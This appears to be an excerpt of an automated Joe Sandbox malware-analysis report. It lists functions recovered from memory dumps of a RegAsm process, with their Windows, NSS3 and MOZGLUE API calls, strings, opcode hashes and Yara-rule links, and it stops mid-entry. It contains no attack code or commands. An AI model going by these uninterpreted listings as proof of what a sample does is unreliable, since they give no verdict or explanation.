String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 23a25cba40e112c0aa5858caca16480c788561548449bf21ad665e2a13c9af30
Instruction ID: 80a558b4aa1e1eaffc3b86c53a69c1067b2cac5b07c3f70fedc980f90f445855
Opcode Fuzzy Hash: 23a25cba40e112c0aa5858caca16480c788561548449bf21ad665e2a13c9af30
Instruction Fuzzy Hash: 4591D275B04215CFDB14CF59C890AAAB7F1FF45318F1944A8E969AB7A1D338EC02CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CBFF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CBFF480

Part of subcall function 6CBCF100: LoadLibraryW.KERNEL32(shell32,?,6CC3D020), ref: 6CBCF122
Part of subcall function 6CBCF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CBCF132

CloseHandle.KERNEL32(00000000), ref: 6CBFF555

Part of subcall function 6CBD14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CBD1248,6CBD1248,?), ref: 6CBD14C9
Part of subcall function 6CBD14B0: memcpy.VCRUNTIME140(?,6CBD1248,00000000,?,6CBD1248,?), ref: 6CBD14EF

Part of subcall function 6CBCEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CBCEEE3

CreateFileW.KERNEL32 ref: 6CBFF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6CBFF523

Strings

\oleacc.dll, xrefs: 6CBFF4CB

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 426e4ea76f4f508490ef690f8aa37ea323251f28404334c72258d46516a3c34f
Instruction ID: dfb2326d86933a4a4b40eb3d620202b4890d0f22304cac7f00b38fc91ee65075
Opcode Fuzzy Hash: 426e4ea76f4f508490ef690f8aa37ea323251f28404334c72258d46516a3c34f
Instruction Fuzzy Hash: ED41BF306087909FE721DF68C984A9FB7F4EF84318F104A1CF5A483650EB34E94ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CDB6DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6CDB6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CDB6E57

Part of subcall function 6CDEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDEC2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6CDB6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6CDB6EAA

Strings

nl, xrefs: 6CDB6DF9

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: nl
API String ID: 3163584228-51495902
Opcode ID: 8445c574d66867321490a3740c8638069e8ee53c2f9fadbfac1b22c0140ed8f1
Instruction ID: 6ea6847205574e6810548b01945eafdbab66b33053e465b36844701603ff55ef
Opcode Fuzzy Hash: 8445c574d66867321490a3740c8638069e8ee53c2f9fadbfac1b22c0140ed8f1
Instruction Fuzzy Hash: 883193B2610512EFDB185F34DC0439EB7A4AB0531AF24863CE59BF6AA0EB30F555CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CC274A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6CC27526
__Init_thread_footer.LIBCMT ref: 6CC27566
__Init_thread_footer.LIBCMT ref: 6CC27597

Strings

UnmapViewOfFile2, xrefs: 6CC27552
kernel32.dll, xrefs: 6CC27557

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 074981c5ae050023ea4a1d044ffc516619a5013bbd98910eb9539aa9f7717014
Instruction ID: 34626e8aecfdcf376813d149b1413604bac69d634b35eda53b6f4ab6aa609acd
Opcode Fuzzy Hash: 074981c5ae050023ea4a1d044ffc516619a5013bbd98910eb9539aa9f7717014
Instruction Fuzzy Hash: B321F531700501ABDB14AFE9C894E5A7375EB8632DF05C528D80597F40FB2DA846CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CD30DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CD30BDE), ref: 6CD30DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6CD30BDE), ref: 6CD30DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CD30BDE), ref: 6CD30DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CD30BDE), ref: 6CD30E32

Strings

%s incr => %d (find lib), xrefs: 6CD30E2D

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 8b1c6b9a09db08c6eeb7bcd0fb386e7867c780eaa448a7aa71385f8803749847
Instruction ID: e91dab1fdb400dd5450789e73f8743d3e267ab707132e95136c1b8ce7ac5928f
Opcode Fuzzy Hash: 8b1c6b9a09db08c6eeb7bcd0fb386e7867c780eaa448a7aa71385f8803749847
Instruction Fuzzy Hash: 2F0124727006209FE6209F65DC45E2773BCDB46A49B15442DE90DE3A91E762FC14C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC2A7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CC4F770,-00000001,?,6CC3E330,?,6CBEBDF7), ref: 6CC2A7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6CBEBDF7), ref: 6CC2A7C2
moz_xmalloc.MOZGLUE(00000018,?,6CBEBDF7), ref: 6CC2A7E4
LeaveCriticalSection.KERNEL32(6CC4F770), ref: 6CC2A80A

Strings

accelerator.dll, xrefs: 6CC2A7BF

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
String ID: accelerator.dll
API String ID: 2442272132-2426294810
Opcode ID: e994e630d13ec32ed094d77d9422bc85ff5486cad35d0a08b57559156d62af9d
Instruction ID: 4a3c40054ec08f772847c814fe7e0e487a724ee2eeba80ab9d2a8a1dc3b24d0d
Opcode Fuzzy Hash: e994e630d13ec32ed094d77d9422bc85ff5486cad35d0a08b57559156d62af9d
Instruction Fuzzy Hash: BB0162716103149FEB04DF96D884D597BF8FF8A769705C06AE9098B751EB74A800CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CBCF0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6CBCEE51,?), ref: 6CBCF0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6CBCF0C2

Strings

ole32, xrefs: 6CBCF0AD
Could not find CoTaskMemFree, xrefs: 6CBCF0E3
Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6CBCF0DC

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: 42dfd4ea372e8df1e61ade33418c5b60a7603d766734caf4e70af006867f2bda
Instruction ID: d82de41f084a3d0d5e4777d92bead56e378e9da104792c1ec0461df3c69d543e
Opcode Fuzzy Hash: 42dfd4ea372e8df1e61ade33418c5b60a7603d766734caf4e70af006867f2bda
Instruction Fuzzy Hash: 2AE086B07457429FAF24AF7B9818A2B3BBDAB52A0D354C46DE552D1F40FE21D420C623

Uniqueness

Uniqueness Score: -1.00%

Function 6CC000D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6CBD7235), ref: 6CC000D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6CC000F7
FreeLibrary.KERNEL32(?,6CBD7235), ref: 6CC0010E

Strings

CryptCATAdminCalcHashFromFileHandle2, xrefs: 6CC000F1
wintrust.dll, xrefs: 6CC000D3

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: 6729f3df4bb5d84389696f232e9ab14330a4a85dd70e8d7fb848046127a5d6e6
Instruction ID: 3a450c1993d257af5f403085e84136ee05870e944a4f9fb3316fc7b1dfd2609e
Opcode Fuzzy Hash: 6729f3df4bb5d84389696f232e9ab14330a4a85dd70e8d7fb848046127a5d6e6
Instruction Fuzzy Hash: 12E0B67474570A9FEF00BF6AC919F267AF9A74724DF60C015A94AC5B41EBB1C450DB10

Uniqueness

Uniqueness Score: -1.00%

Function 6CC2C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CC2C0E9), ref: 6CC2C418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CC2C437
FreeLibrary.KERNEL32(?,6CC2C0E9), ref: 6CC2C44C

Strings

NtQueryVirtualMemory, xrefs: 6CC2C431
ntdll.dll, xrefs: 6CC2C413

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 2dcc115fb778b6dbfbfabbd351a732e704cbfca1bcae35971b9d1f5a5227a796
Instruction ID: 391e24b034015d5819f3bca817b2c113aecf36c987808bcb6ec87efe66e6ad83
Opcode Fuzzy Hash: 2dcc115fb778b6dbfbfabbd351a732e704cbfca1bcae35971b9d1f5a5227a796
Instruction Fuzzy Hash: F3E0B670A057019FEF00BFB6CD18B167FF8A74724CF00D516AA0499A41EBB4C4008B50

Uniqueness

Uniqueness Score: -1.00%

Function 6CC275B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CC2748B,?), ref: 6CC275B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CC275D7
FreeLibrary.KERNEL32(?,6CC2748B,?), ref: 6CC275EC

Strings

ntdll.dll, xrefs: 6CC275B3
RtlNtStatusToDosError, xrefs: 6CC275D1

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 80b4abc5e50e9f0354caa4c25b62c2f503d7f5f6c30063990cc7cffebde1a4ce
Instruction ID: ee24843be3b45500ebcee7c9078337c9fe669c95cfa4d2b963dfeee0c81c1d9c
Opcode Fuzzy Hash: 80b4abc5e50e9f0354caa4c25b62c2f503d7f5f6c30063990cc7cffebde1a4ce
Instruction Fuzzy Hash: B3E0B671605702AFEF00BFA6C898B05BEF8EB4721CF10D025A905D1641EBFC8491CF11

Uniqueness

Uniqueness Score: -1.00%

Function 6CC27600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CC27592), ref: 6CC27608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6CC27627
FreeLibrary.KERNEL32(?,6CC27592), ref: 6CC2763C

Strings

NtUnmapViewOfSection, xrefs: 6CC27621
ntdll.dll, xrefs: 6CC27603

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: 0be692bb6a7ed2486722720085590669b19f3e00680899e3384668705ae97a88
Instruction ID: 5c72500f44fe979340c15b53e0f439e90944202906aac036d0b6aa957ed5f199
Opcode Fuzzy Hash: 0be692bb6a7ed2486722720085590669b19f3e00680899e3384668705ae97a88
Instruction Fuzzy Hash: 98E0B6B4605701AFDF00BFA6C858B057EB9E75A35DF11C115E905D1741EBB8C410CF14

Uniqueness

Uniqueness Score: -1.00%

Function 6CC2BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6CC2BE49), ref: 6CC2BEC4
RtlCaptureStackBackTrace.NTDLL ref: 6CC2BEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6CC2BE49), ref: 6CC2BF38
RtlReAllocateHeap.NTDLL ref: 6CC2BF83
RtlFreeHeap.NTDLL(6CC2BE49,00000000), ref: 6CC2BFA6

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: 28179c5ad38a69262b6e805428f385e9ed7fc0428f3178f92097356b99ace23a
Instruction ID: 1288850ea9a3978a9da7c5281c37f6e80160ce7d0f80abeba641182913b78c3f
Opcode Fuzzy Hash: 28179c5ad38a69262b6e805428f385e9ed7fc0428f3178f92097356b99ace23a
Instruction Fuzzy Hash: 34519375A002158FE724CF69CD90B9AB3B2FF88314F294639D556A7B54E734F9068B80

Uniqueness

Uniqueness Score: -1.00%

Function 6CC18E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6CC0B58D,?,?,?,?,?,?,?,6CC3D734,?,?,?,6CC3D734), ref: 6CC18E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CC0B58D,?,?,?,?,?,?,?,6CC3D734,?,?,?,6CC3D734), ref: 6CC18EBF
free.MOZGLUE(?,?,?,?,6CC0B58D,?,?,?,?,?,?,?,6CC3D734,?,?,?), ref: 6CC18F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CC0B58D,?,?,?,?,?,?,?,6CC3D734,?,?,?,6CC3D734), ref: 6CC18F46
free.MOZGLUE(?,?,?,?,6CC0B58D,?,?,?,?,?,?,?,6CC3D734,?,?,?), ref: 6CC18F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CC0B58D,?,?,?,?,?,?,?,6CC3D734,?,?,?), ref: 6CC18F8F

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 45fc883188e0113ca861c9f4e288b026508581c2c1785ea324901d513d63c2ff
Instruction ID: 6bed57d4db2da0f4a2e507e5b57ef7e1ff95e5c86d35b515b50f5e1eeb1baf71
Opcode Fuzzy Hash: 45fc883188e0113ca861c9f4e288b026508581c2c1785ea324901d513d63c2ff
Instruction Fuzzy Hash: 6A51E9B5A092158FEB10CF59D880B6E73B2FF45308F16452AD916ABB40F731F905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CC127E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CC12620,?,?,?,6CC060AA,6CC05FCB,6CC079A3), ref: 6CC1284D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC12620,?,?,?,6CC060AA,6CC05FCB,6CC079A3), ref: 6CC1289A
free.MOZGLUE(?,?,?,6CC12620,?,?,?,6CC060AA,6CC05FCB,6CC079A3), ref: 6CC128F1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC12620,?,?,?,6CC060AA,6CC05FCB,6CC079A3), ref: 6CC12910
free.MOZGLUE(00000001,?,?,6CC12620,?,?,?,6CC060AA,6CC05FCB,6CC079A3), ref: 6CC1293C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6CC12620,?,?,?,6CC060AA,6CC05FCB,6CC079A3), ref: 6CC1294E

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 85f76cf17fc5b612b7fb86090d576783e8595d39b341b9f6a12a4513ce7d258d
Instruction ID: 4afa2c6061dc3a38e52b32e724b88f698cfe766dffa804ad3888c307e68b5e34
Opcode Fuzzy Hash: 85f76cf17fc5b612b7fb86090d576783e8595d39b341b9f6a12a4513ce7d258d
Instruction Fuzzy Hash: 8841C0B9A082068FEB10CF69D89476A73F6FB46308F244939D956EBB40F731E905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6CBCCFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CC4E784), ref: 6CBCCFF6
LeaveCriticalSection.KERNEL32(6CC4E784), ref: 6CBCD026
VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6CBCD06C
VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6CBCD139

Strings

MOZ_CRASH(), xrefs: 6CBCD187

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionVirtual$AllocEnterFreeLeave
String ID: MOZ_CRASH()
API String ID: 1090480015-2608361144
Opcode ID: 351cab8b4d4f92ca19ddb53118ee18f54e67190115d4691c5b84531a3a8b9fc3
Instruction ID: 87fb1b34980c78694705ee7f2408d9bc3b987949eebb65465fbfaed7683358eb
Opcode Fuzzy Hash: 351cab8b4d4f92ca19ddb53118ee18f54e67190115d4691c5b84531a3a8b9fc3
Instruction Fuzzy Hash: 4741E275B806264FDB04DE7C9CA036AB6B4EB49728F16813DE918E7784D7B19C018BD2

Uniqueness

Uniqueness Score: -1.00%

Function 6CBC4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CBC4E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CBC4E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBC4EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CBC4F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CBC4F1E

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: cd81b5fa7782d264d55f5c30f2d7f68f2a2144da570c99098b656d58269fd2bc
Instruction ID: 73f1d3cc297bbe050ee59d592f8e8640e89ed4b980b5bb0034895e0fc19f5d77
Opcode Fuzzy Hash: cd81b5fa7782d264d55f5c30f2d7f68f2a2144da570c99098b656d58269fd2bc
Instruction Fuzzy Hash: 2541BF716047869FC705CF29C4809ABBBE4FF89354F118A2DF46987A41D770EA58CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

